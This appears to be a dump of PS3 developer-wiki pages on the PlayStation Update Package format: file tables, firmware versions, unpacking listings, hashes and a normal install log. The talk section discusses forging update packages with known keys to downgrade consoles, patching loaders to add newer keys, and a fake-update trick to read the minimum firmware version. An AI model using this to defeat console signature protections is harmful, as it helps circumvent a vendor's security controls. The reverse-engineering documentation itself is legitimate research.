Offset<br /> |-<br /> | 0x10 || 0x8 || unsigned long || Data Length<br /> |-<br /> | 0x20 || 0x20 || unsigned long || Data FileName (see below)<br /> |}<br /> ====Filename IDs====<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! File Entry ID !! Filename<br /> |-<br /> | 0x1 || sdk_version<br /> |-<br /> | 0x2 || version.txt<br /> |-<br /> | 0x3 || ros (''CORE_OS_PACKAGE.pkg'')<br /> |-<br /> | 0x4 || trvk_prg<br /> |-<br /> | 0x5 || trvk_pkg<br /> |-<br /> | 0x6 || nand_update<br /> |-<br /> | 0x7 || bdit_firmware<br /> |-<br /> | 0x8 || bdpt_301r_firmware<br /> |-<br /> | 0x9 || bdpt_303r_firmware<br /> |-<br /> |}<br /> ===== bdit_firmware / bdpt_301r_firmware / bdpt_303r_firmware / nand_update / ros / trvk_pkg / trvk_prg =====<br /> ======Header======<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x4 || unsigned long || Unknown<br /> |-<br /> | 0x4 || 0x4 || unsigned long || File Count<br /> |-<br /> | 0x8 || 0x8 || unsigned long || File Length<br /> |-<br /> | 0x10 || 0x30 * '''File Count''' || '''File Table''' || File Table<br /> |-<br /> |}<br /> ======File Table======<br /> The file table consists of a number of file entries determined by '''File Count''', with the format below:<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x8 || unsigned long || Data Offset<br /> |-<br /> | 0x10 || 0x8 || unsigned long || Data Length<br /> |-<br /> | 0x20 || 0x20 || unsigned long || DataName&lt;br /&gt;<br /> * bdit_firmware -&gt; BDIT_FIRMWARE_PACKAGE.pkg<br /> * bdpt_301r_firmware -&gt; BDPT_FIRMWARE_PACKAGE_301R.pkg<br /> * bdpt_303r_firmware -&gt; BDPT_FIRMWARE_PACKAGE_303R.pkg<br /> * trvk_pkg -&gt; RL_FOR_PACKAGE.img<br /> * trvk_prg -&gt; RL_FOR_PROGRAM.img<br /> * ros -&gt; CORE_OS_PACKAGE.pkg<br /> * nand_update -&gt; NAND_UPDATE.pkg.[01]-[28]<br /> |-<br /> | 0x40 || '''Data Length''' || unsigned long || SCE signed package data<br /> |-<br /> |}<br /> ====== CORE_OS_PACKAGE.pkg ======<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! File Entry ID !! Filename<br /> |-<br /> | || aim_spu_module.self<br /> |-<br /> | || appldr<br /> |-<br /> | || creserved_0<br /> |-<br /> | || default.spp<br /> |-<br /> | || isoldr<br /> |-<br /> | || lv0<br /> |-<br /> | || lv1.self<br /> |-<br /> | || lv1ldr<br /> |-<br /> | || lv2_kernel.self<br /> |-<br /> | || lv2ldr<br /> |-<br /> | || mc_iso_spu_module.self<br /> |-<br /> | || me_iso_spu_module.self<br /> |-<br /> | || rvkldr<br /> |-<br /> | || sb_iso_spu_module.self<br /> |-<br /> | || sc_iso.self<br /> |-<br /> | || sdk_version<br /> |-<br /> | || spp_verifier.self<br /> |-<br /> | || spu_pkg_rvk_verifier.self<br /> |-<br /> | || spu_token_processor.self<br /> |-<br /> | || sv_iso_spu_module.self<br /> |-<br /> | || sys_init_app.self<br /> |-<br /> | || sys_init_ios.self<br /> |-<br /> | || sysctl.txt<br /> |-<br /> |}<br /> <br /> === known updates ===<br /> <br /> ==== 0.2 ebootrom ====<br /> <br /> ==== 0.3 ebootrom ====<br /> <br /> ==== 0.60 ebootrom ====<br /> &lt;pre&gt; 0.60: lv0 contains string : 'Sony CXD9823 NAND Controller'&lt;/pre&gt;<br /> &lt;pre&gt;Boot Loader SE Version 0.6 2006-01-31_13:53:04&lt;/pre&gt;<br /> &lt;pre&gt;Boot Loader SE Version 0.5.2005-12-28_16:10:53&lt;/pre&gt;<br /> <br /> ==== 0.80 ebootrom ====<br /> &lt;pre&gt; key: rev 0x00&lt;/pre&gt;<br /> <br /> ==== 0.84 ebootrom ====<br /> &lt;pre&gt; 0.84: lv0 doesnt contain previous mentioned string&lt;/pre&gt;<br /> &lt;pre&gt;from decrypted lv0 0.84: Boot Loader SE Version 0.8.4 (Build ID: 822,8517, Build Data: 2006-05-16_17:50:21)&lt;/pre&gt;<br /> <br /> ==== 0.85 ebootrom ====<br /> <br /> ==== 0.90 ebootrom ====<br /> <br /> ==== 0.90 PUP ====<br /> &lt;pre&gt; ? 0.90: PS3UPDAT.PUP format was implemented since 0.90 ?&lt;/pre&gt;<br /> <br /> ==== 0.92 ebootrom ====<br /> &lt;pre&gt; key: rev 0x01 + NP rev 0x01&lt;/pre&gt;<br /> <br /> ==== 0.93 ebootrom ====<br /> <br /> ==== 0.94 ebootrom ====<br /> <br /> ==== 0.95 PUP ====<br /> <br /> ==== 0.96 PUP ====<br /> <br /> ==== 100.002 ebootrom ====<br /> &lt;pre&gt;from decrypted lv0: Boot Loader SE Version 1.0.0 (Build ID: 1643,16413, Build Data: 2006-10-05_16:32:34)&lt;/pre&gt;<br /> [http://www.multiupload.com/FZHV557R2J ebootrom.100.002.rar (51.29 MB)]<br /> <br /> * https://mega.co.nz/#!YgsziJjT!j4EzExE18pmIrv6a2ITbfMrRPollgzPdpvTjze1CuEc</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Playstation_Update_Package_(PUP)&diff=43597 Talk:Playstation Update Package (PUP) 2017-02-20T16:09:25Z <p>Mathieulh: /* Using fake upgrade to get lowest firmware version info */ Added more info on min downgrade praxis- DECHA00A min version to be confirmed.</p> <hr /> <div>= Playstation Update Package (PUP) - Discussion/Talk =<br /> <br /> What is the part that defines, what firmware it really is?. I mean, for firmwares below 3.55 we have all the keys so whe can forge any PUP and make it appear as a +3.55, that would be a way to downgrade, without the need of a dongle and recovery mode.<br /> <br /> I know there are version strings in pupheader,version.txt, info0, and in vsh.self.. but what is missing? What isn´t correclty set in mfw to make it pass the checks of a legit +3.55 fw? <br /> <br /> We are using recovery mode to downgrade because, we haven´t found a way to create a legit +3.55 <br /> <br /> <br /> == Unpacking a firmware ==<br /> ===Unpack the PUP===<br /> Dots.txt<br /> license.xml<br /> ps3swu.self<br /> ps3swu2.self<br /> spkg_hdr.tar<br /> Update_Files.tar<br /> update_flags.txt<br /> Version.txt<br /> VSH.tar<br /> <br /> === Untar the Update_Files.tar ===<br /> BDIT_FIRMWARE_PACKAGE.pkg<br /> BDPT_FIRMWARE_PACKAGE_301R.pkg<br /> BDPT_FIRMWARE_PACKAGE_302R.pkg<br /> BDPT_FIRMWARE_PACKAGE_303R.pkg<br /> BDPT_FIRMWARE_PACKAGE_304R.pkg<br /> BDPT_FIRMWARE_PACKAGE_306R.pkg<br /> BDPT_FIRMWARE_PACKAGE_308R.pkg<br /> BDPT_FIRMWARE_PACKAGE_310R.pkg<br /> BDPT_FIRMWARE_PACKAGE_312R.pkg<br /> BDPT_FIRMWARE_PACKAGE_314R.pkg<br /> BDPT_FIRMWARE_PACKAGE_316R.pkg<br /> BLUETOOTH_FIRMWARE.pkg<br /> CORE_OS_PACKAGE.pkg<br /> dev_flash3_023.tar.aa.2013_06_20_055817<br /> dev_flash_000.tar.aa.2013_06_20_055817<br /> dev_flash_001.tar.aa.2013_06_20_055817<br /> dev_flash_002.tar.aa.2013_06_20_055817<br /> dev_flash_003.tar.aa.2013_06_20_055817<br /> dev_flash_004.tar.aa.2013_06_20_055817<br /> dev_flash_005.tar.aa.2013_06_20_051337<br /> dev_flash_006.tar.aa.2013_06_20_051337<br /> dev_flash_007.tar.aa.2013_06_20_051337<br /> dev_flash_008.tar.aa.2013_06_20_051337<br /> dev_flash_009.tar.aa.2013_06_20_051337<br /> dev_flash_010.tar.aa.2013_06_20_051337<br /> dev_flash_011.tar.aa.2013_06_20_051337<br /> dev_flash_012.tar.aa.2013_06_20_051337<br /> dev_flash_013.tar.aa.2013_06_20_051337<br /> dev_flash_014.tar.aa.2013_06_20_051337<br /> dev_flash_015.tar.aa.2013_06_20_051337<br /> dev_flash_016.tar.aa.2013_06_20_051337<br /> dev_flash_017.tar.aa.2013_06_20_051337<br /> dev_flash_018.tar.aa.2013_06_20_051337<br /> dev_flash_019.tar.aa.2013_06_20_051337<br /> dev_flash_020.tar.aa.2013_06_20_051337<br /> dev_flash_021.tar.aa.2013_06_20_051337<br /> dev_flash_022.tar.aa.2013_06_20_055817<br /> MULTI_CARD_FIRMWARE.pkg<br /> RL_FOR_PACKAGE.img<br /> RL_FOR_PROGRAM.img<br /> SYS_CON_FIRMWARE_01000006.pkg<br /> SYS_CON_FIRMWARE_01010303.pkg<br /> SYS_CON_FIRMWARE_01020302.pkg<br /> SYS_CON_FIRMWARE_01030302.pkg<br /> SYS_CON_FIRMWARE_01040402.pkg<br /> SYS_CON_FIRMWARE_01050002.pkg<br /> SYS_CON_FIRMWARE_01050101.pkg<br /> SYS_CON_FIRMWARE_S1_00010002083E0832.pkg<br /> UPL.xml.pkg<br /> ==== unpkg CORE_OS_PACKAGE.pkg ====<br /> content<br /> info0<br /> info1<br /> ===== cosunpkg content from CORE_OS_PACKAGE.pkg =====<br /> aim_spu_module.self<br /> appldr<br /> creserved_0<br /> default.spp<br /> emer_init.self<br /> eurus_fw.bin<br /> hdd_copy.self<br /> isoldr<br /> lv0<br /> lv1.self<br /> lv1ldr<br /> lv2ldr<br /> lv2_kernel.self<br /> manu_info_spu_module.self<br /> mc_iso_spu_module.self<br /> me_iso_spu_module.self<br /> sb_iso_spu_module.self<br /> sc_iso.self<br /> sdk_version<br /> spp_verifier.self<br /> spu_pkg_rvk_verifier.self<br /> spu_token_processor.self<br /> spu_utoken_processor.self<br /> sv_iso_spu_module.self<br /> ====== unself the self's ======<br /> ...<br /> ==== unpkg dev_flash* ====<br /> content<br /> info0<br /> info1<br /> ===== untar dev_flash* content =====<br /> ...<br /> <br /> ==3.55 example==<br /> <br /> PSUPDATE.PUP<br /> ├── dots.txt<br /> ├── license.txt<br /> ├── ps3swu.self <br /> ├── update_files.tar<br /> │ ├── BDIT_FIRMWARE_PACKAGE.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_301R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_302R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_303R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_304R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_306R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_308R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BLUETOOTH_FIRMWARE.pkg<br /> │ │ ├── content<br /> │ │ │ ├── RC29_firmware_footer.dfu<br /> │ │ │ ├── usb8780-5.0.1-A1-A2.dfu<br /> │ │ │ └── usb8781-20.0.12.0.dfu<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── CORE_OS_PACKAGE.pkg<br /> │ │ ├── aim_spu_module.self<br /> │ │ ├── appldr<br /> │ │ ├── creserved_0<br /> │ │ ├── default.spp<br /> │ │ ├── emer_init.self<br /> │ │ ├── eurus_fw.bin<br /> │ │ ├── hdd_copy.self<br /> │ │ ├── isoldr<br /> │ │ ├── lv0<br /> │ │ ├── lv1ldr<br /> │ │ ├── lv1.self<br /> │ │ ├── lv2_kernel.self<br /> │ │ ├── lv2ldr<br /> │ │ ├── manu_info_spu_module.self<br /> │ │ ├── mc_iso_spu_module.self<br /> │ │ ├── me_iso_spu_module.self<br /> │ │ ├── sb_iso_spu_module.self<br /> │ │ ├── sc_iso.self<br /> │ │ ├── sdk_version<br /> │ │ ├── spp_verifier.self<br /> │ │ ├── spu_pkg_rvk_verifier.self<br /> │ │ ├── spu_token_processor.self<br /> │ │ ├── spu_utoken_processor.self<br /> │ │ └── sv_iso_spu_module.self<br /> │ ├── dev_flash_''XXX''.tar.aa.''DATE/TIME''<br /> │ ├── dev_flash3_''XXX''.tar.aa.''DATE/TIME''<br /> │ ├── MULTI_CARD_FIRMWARE.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── RL_FOR_PACKAGE.img<br /> │ ├── RL_FOR_PROGRAM.img<br /> │ ├── SYS_CON_FIRMWARE_01000006.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01010303.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01020302<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01030302.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01040402.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01050002.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01050101.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_S1_00010002083E0832.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ └── UPL.xml.pkg<br /> │ ├── content<br /> │ ├── info0<br /> │ └── info1<br /> ├── update_files.tar<br /> ├── update_flags.txt<br /> ├── version.txt<br /> └── vsh.tar<br /> <br /> ----<br /> <br /> ==Adding new keys to older firmwares==<br /> <br /> patch the loaders<br /> add keys to appldr keys index &amp; tables<br /> there are also npdrm keys inside appldr as well, add the 3.56++ ones<br /> appldr,. lv2.self and game_ext_plugin need patching for new games support<br /> vsh.self maybe too<br /> [http://www.ps3hax.net/showpost.php?p=260186&amp;postcount=14 Creating a MFW? (3.41/3.55 with 3.56 keys)]<br /> <br /> <br /> Proof of concept with added keys to appldr (and none of the other mentioned files above) : [[Talk:Patches#appldr_3.55_add_3.56.2F3.60_keys|appldr 3.55 add 3.56/3.60 keys]]<br /> <br /> ----<br /> <br /> == Using fake upgrade to get lowest firmware version info ==<br /> &lt;div style=&quot;float:right&quot;&gt;[[File:PS3 MinVerChk used on CECHG04 SEM-001.jpg|thumb|left|PS3_MinVerChk use on the CECHG04, using fake upgrade to get lowest firmware version info]]&lt;/div&gt;<br /> <br /> &lt;span style=&quot;text-decoration: line-through;&quot;&gt;http://ps3devwiki.com/files/firmware/MFW-CEX/MinVerCheck/&lt;/span&gt; // &lt;span style=&quot;text-decoration: line-through;&quot;&gt;[http://www.mirrorcreator.com/files/KMIA5YMJ/MinVerCheck.rar_links MinVerChk.rar (1.28 KB)]&lt;/span&gt; / &lt;span style=&quot;text-decoration: line-through;&quot;&gt;[http://www.sendspace.com/file/l2fixi mirror]&lt;/span&gt; --- [https://mega.nz/#!FUVm1C7a!IbCyN_uzCQh7hZb7eu3pRrwBuezLh1r4Ha7eeB9RlZk mirror 2]<br /> CRC-16: 9A11<br /> CRC-32 (Ethernet and PKZIP): 50EE9A92<br /> SHA-1: 1B60E0ADE8E698D9796AA78B7AD54B10E05A9B0B<br /> MD-5: BB39828156BC7DF144E4D06D81C801AB<br /> # Unrar and copy this MinVerChk PUP to your USB stick (/PS3/UPDATE/PS3UPDAT.PUP), the same way as if it was an firmware upgrade.<br /> # Insert the USB stick into the PS3.<br /> # Start a firmware update like normal from XMB (Don’t worry, it will not update!)<br /> # It will shortly fail and display the Firmware Base Value<br /> <br /> Note: console needs to run at least FW 2.50? (2.30 didn't work); This only works when the minimum update version is 1.00, otherwise any minimum value lower than 1.00 reports as 1.00 using this method.<br /> DECR-1000 (0.08) and DECHA00A (??0.92??) are effectively affected by this.<br /> <br /> ----<br /> <br /> == Hashes ==<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable sortable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Version !! MD5 !! SHA1 !! CRC32 !! CRC16 !! HMAC_SHA1<br /> |-<br /> | 0 file (do not use) || MD5::1f5039e50bd66b290c56684d8550c6c2 || SHA1::7b91dbdc56c5781edf6c8847b4aa6965566c5c75 || CRC32::2A0E7DBB || CRC16::0 || HMAC_SHA1::<br /> |-<br /> | 3.41 RETAIL/CEX PSJB || MD5::6f1ef9144c43c9a6f00f7ee7464a6689 || SHA1::f3c19e06c0e7b8cc550bb3244f5f88356173fa6d || CRC32::8A1E7548 || CRC16::7FFC || HMAC_SHA1::9F7001A6A93AE03A61ED7CFB7156A68DF0740708<br /> |-<br /> |}<br /> <br /> <br /> === PS3UPDAT.SHA === <br /> <br /> Some BluRay-Movie Discs contain firmware updates for the Playstation 3 Console. Inside the /PS3/UPDATE folder can be a file called &quot;PS3UPDAT.SHA&quot;.<br /> <br /> ==== example ====<br /> <br /> This is an example from the movie &quot;Priest&quot; with [[3.50 CEX|3.50]] firmware<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! 0x002F070 - 0x002F8CF <br /> |-<br /> | &lt;pre&gt;Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 00000000 61 7F 7F 6B 07 07 07 0B 00 00 00 00 00 00 00 00 a..k............<br /> 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br /> 00000020 B8 19 86 1F 75 D5 08 82 14 2C BE C8 AF 54 B0 00 ....u....,...T..<br /> 00000030 12 BC 04 9D 00 00 00 00 00 00 00 00 00 00 00 00 ................<br /> &lt;/pre&gt;<br /> |-<br /> |}<br /> ==== structure ====<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address !! Size !! Value !! Description !! Observations <br /> |-<br /> | 0x0 || 0x8 || 61 7F 7F 6B 07 07 07 0B || Unknown || <br /> |-<br /> | 0x8 || 0x18 || 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 || Padding ||<br /> |-<br /> | 0x20 || 0x14 || B8 19 86 1F 75 D5 08 82 14 2C BE C8 AF 54 B0 00 12 BC 04 9D || SHA1 hash of PS3UPDAT.PUP || <br /> |-<br /> | 0x34 || 0xC || 00 00 00 00 00 00 00 00 00 00 00 00 || Padding || <br /> |-<br /> | Rest || Rest || Rest || Encrypted Data ||<br /> |}<br /> <br /> <br /> ----<br /> <br /> ==Repositories==<br /> <br /> [http://pubrepo.stoker25.com/Consoles/Playstation%203/updates/ stoker25 - specialises in debug/DEX and DECR/TOOL firmwares] (self hosted)<br /> <br /> == Remark @ Installation ==<br /> <br /> ps3d storage region 3 on the internal harddisk (ps3dc) is used by the PS3 as temp for installing updates. When installing PUP files, the PUP content gets unpacked there, checked - the system flags the update bit and prompts for reboot. After reboot it sees the update bit set and installs the files from ps3dc without rechecking (!) -&gt; possible attack vector for circumventing checks, like down-/crossgrading). edit-note: doesn't seem to be true, it is still checked.<br /> <br /> ps3d - 4 possible regions :<br /> ps3da : whole disk<br /> ps3db : UFS2 : GameOS<br /> ps3dc : FAT (2GB) : Update<br /> ps3dd : EXT3 : OtherOS (in the &lt;=3.15 way)<br /> <br /> <br /> == No applicable data found - technical pov ==<br /> <br /> Reasons why the playstation updating process does not recognize a pup.<br /> <br /> * 1) Missing files/Reading failure of:<br /> ** [[patch_build.txt]] (vsh target)<br /> ** [[promo_flags.txt]] (incorrect flag will result in &quot;data corrupt&quot;)<br /> <br /> * 2) [[update_files.tar]]<br /> ** unable to open PUP (rb)<br /> ** unable to read first 0x30 Bytes (header)<br /> ** unable to read further 0x20 Bytes sized segment_table (aka file tables)<br /> ** unable to find [[CoreOS|core os package.pkg]] inside update_files.tar<br /> <br /> * 3) Unable to open Storage Region 1/2 on HDD.<br /> * 4) No Media present. (no success when fstat)<br /> <br /> == Sample Logs normal installation ==<br /> http://pastie.org/10059999<br /> &lt;pre&gt;<br /> cellFsUtilMount: /dev_hdd0<br /> Configuration read. bd_video_region=0,dvd_video_region=0<br /> spoof_version = 0000, spoof_revision = 0<br /> BDemulator: disabled<br /> real disc type = ff71<br /> effective disc type = ff71, fake disc type = 0<br /> probe hdd<br /> (v)HDD found.<br /> probe hdd done<br /> vflash is enabled. search system region.<br /> search system region<br /> device_id = 0x101000000000007, system_region_id = 0x1<br /> ACL[0]: LAID = 0x1070000001000001 : ACL =0xb<br /> system region found(mode = 0).<br /> search system region done.<br /> search flash regions<br /> cellFsUtilMount: /dev_flash<br /> /dev_flash is clean.<br /> [(v)flash]<br /> info.vendor_id = 0x0<br /> info.device_id = 0x0<br /> info.sector_size = 0x200<br /> info.media_count = 0x1<br /> info.capacity = 0x80000<br /> [device_id = 0x100000200000001]<br /> info.capacity = 0x63e00<br /> flash region 0x2 found.<br /> expected: start sectors = 0x7800, n_sectors = 0x63e00<br /> start sector = 0x7800.<br /> start sector is correct<br /> region size is correct<br /> [device_id = 0x100000300000001]<br /> info.capacity = 0x8000<br /> flash region 0x3 found.<br /> expected: start sectors = 0x6b600, n_sectors = 0x8000<br /> start sector = 0x6b600.<br /> [device_id = 0x100000400000001]<br /> info.capacity = 0x400<br /> flash region 0x4 found.<br /> expected: start sectors = 0x73600, n_sectors = 0x400<br /> start sector = 0x73600.<br /> [device_id = 0x100000500000001]<br /> info.capacity = 0x2000<br /> flash region 0x5 found.<br /> expected: start sectors = 0x73a00, n_sectors = 0x2000<br /> start sector = 0x73a00.<br /> found all flash regions.<br /> search normal region<br /> normal region 1 found.<br /> search normal region done.<br /> normal region 2 found.<br /> Storage event: 7 0 10300000000000a<br /> Storage event: 3 0 10300000000000a<br /> search update package<br /> seach update package in GAME disc<br /> Disc auth: 5004 29 (process: 01000200_main_mer_init.self)<br /> set drive policy success<br /> profile = 0xff71<br /> umount BDVD<br /> umount /dev_bdvd failure = 0x80010002<br /> mount BDVD<br /> cellFsUtilMount: /dev_bdvd<br /> mount /dev_bdvd success<br /> /dev_bdvd/PS3_UPDATE/PS3UPDAT.PUP found<br /> verify /dev_bdvd/PS3_UPDATE/PS3UPDAT.PUP<br /> Initializing<br /> taking a while...<br /> start Updating Proccess<br /> Initialize elapsed time = 3325 msec<br /> check UPL<br /> Check UPL elapsed time = 79 msec<br /> check Package Size<br /> get package size elapsed time = 25 msec<br /> start Verifying Package only<br /> update package elapsed time = 1731 msec<br /> Updating or Verifying failure 0x8002f169<br /> USB storage: id = 0x10300000000000a<br /> lun = 0x0<br /> info.capacity = 0xffffffffe8df8800<br /> lun = 0x0, dev_index = 0xa<br /> index = 0x0, pkg_index = 0x2<br /> mount USB storage 0<br /> mp_name = /dev_usb000<br /> umount /dev_usb000 failure = 0x80010002<br /> mount USB storage 0(LUN=0x0)<br /> dev_name = CELL_FS_IOS:USB_MASS_STORAGE000, mp_name = /dev_usb000<br /> cellFsUtilMount: /dev_usb000<br /> mount /dev_usb000 success<br /> /dev_usb000/PS3/UPDATE/PS3UPDAT.PUP found<br /> verify /dev_usb000/PS3/UPDATE/PS3UPDAT.PUP<br /> Storage event: 4 0 101000000000006<br /> Disc removed.<br /> Storage event: 8 0 101000000000006<br /> Initialize elapsed time = 547 msec<br /> Check UPL elapsed time = 148 msec<br /> get package size elapsed time = 17 msec<br /> update package elapsed time = 18979 msec<br /> post processiong...<br /> post processiong done<br /> search update package done<br /> not to be skipped formatting system region.<br /> re-use old partitions.<br /> re-use old flash partitions.<br /> cellFsUtilMount: /dev_hdd1<br /> setup environment for ps3updater<br /> mount game cache<br /> mount game cache success<br /> mkdir /dev_hdd1/PS3UPDATE success<br /> mkdir /dev_hdd1/PS3UPDATE/vsh success<br /> mkdir /dev_hdd1/PS3UPDATE/vsh/etc success<br /> mkdir /dev_hdd1/PS3UPDATE/data success<br /> mkdir /dev_hdd1/PS3UPDATE/data/font success<br /> Initialize elapsed time = 582 msec<br /> Check UPL elapsed time = 160 msec<br /> update package elapsed time = 20137 msec<br /> copy /dev_usb000/PS3/UPDATE/PS3UPDAT.PUP to /dev_hdd1/PS3UPDATE/PS3UPDAT.PUP<br /> copy id = 0x100, dst = /dev_hdd1/PS3UPDATE/ps3version.txt<br /> copy id = 0x601, dst = /dev_hdd1/PS3UPDATE/ps3swu.self<br /> extarct id = 0x201, dst = /dev_hdd1/PS3UPDATE<br /> segment = 0x300, offset = 0x56f5b0, size = 0xc0e4c00<br /> file_num = 51<br /> required patch_name : /BDIT_FIRMWARE_PACKAGE.pkg.spkg_hdr.1<br /> segment = 0x501, offset = 0xc6541b0, size = 0x14000<br /> file_num = 49<br /> patch found: offset = 0xc6543b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_301R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6549b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_302R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc654fb0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_303R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6555b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_304R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc655bb0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_306R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6561b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_308R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6567b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_310R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc656db0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_312R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6573b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_314R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6579b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_316R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc657fb0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_318R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6585b0, size = 0x280<br /> required patch_name : /BLUETOOTH_FIRMWARE.pkg.spkg_hdr.1<br /> patch found: offset = 0xc658bb0, size = 0x280<br /> required patch_name : /CORE_OS_PACKAGE.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6591b0, size = 0x280<br /> required patch_name : /MULTI_CARD_FIRMWARE.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6597b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01000006.pkg.spkg_hdr.1<br /> patch found: offset = 0xc659db0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01010303.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65a3b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01020302.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65a9b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01030302.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65afb0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01040402.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65b5b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01050002.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65bbb0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01050101.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65c1b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_S1_00010002083E0832.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65c7b0, size = 0x280<br /> required patch_name : /UPL.xml.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65cdb0, size = 0x280<br /> required patch_name : /RL_FOR_PACKAGE.img.spkg_hdr.1<br /> patch for /RL_FOR_PACKAGE.img not found. skipped<br /> required patch_name : /RL_FOR_PROGRAM.img.spkg_hdr.1<br /> patch for /RL_FOR_PROGRAM.img not found. skipped<br /> required patch_name : /dev_flash3_024.tar.aa.2015_02_05_035051.spkg_hdr.1<br /> patch found: offset = 0xc65d3b0, size = 0x280<br /> required patch_name : /dev_flash_000.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65d9b0, size = 0x280<br /> required patch_name : /dev_flash_001.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65dfb0, size = 0x280<br /> dir_num = 1<br /> dirname = /dev_flash/data/font/<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/<br /> file_num = 20<br /> filename = /dev_flash/data/font/SCE-PS3-RD-R-LATIN2.TTF, offset = 0400, size = 0xd67c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-R-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-R-LATIN.TTF, offset = 0de00, size = 0x95f4<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-R-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-VR-R-LATIN2.TTF, offset = 017600, size = 0x218b0<br /> dstname = 